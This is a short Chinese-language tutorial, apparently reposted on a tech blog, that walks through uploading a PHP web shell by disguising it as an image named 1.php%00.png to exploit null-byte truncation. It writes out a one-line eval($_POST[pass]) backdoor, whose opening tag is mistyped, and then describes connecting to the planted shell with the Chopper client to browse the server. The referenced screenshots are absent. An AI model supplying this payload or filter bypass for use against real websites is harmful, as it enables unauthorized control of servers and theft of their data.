在kali的里面随机找一张png结尾的图片,然后重命名一下改成1.php%00.png。
改成这样的名字!!
然后用编辑器编辑一下!
在空白处写入一句话木马!!<%php @eval($_POST[pass]);?>
像这样:
然后保存!
打开burpsuit抓个包看看!!
可惜了,我们用了%00截断不需要改包!
这样就上传成功!!!
在菜刀地址上填上上路径!!再填上上密码!!!
就可以看见我的服务器里面的目录了,因为我的centos 7 所以罗!
然后我们进入我的服务器端看看!!
画红线的就是我们上传的木马!!!
本文来自投稿,不代表本人立场,如若转载,请注明出处:http://www.souzhinan.com/kj/324005.html
赞 (166)
打赏
设立根服务器,中国互联网不再受制于人?别再误导大众了
« 上一篇2020-02-22 11:33:17
2000元以内性价比最高的手机,8+128GB售价1999元,值得购买?
下一篇 »2020-02-22 11:48:23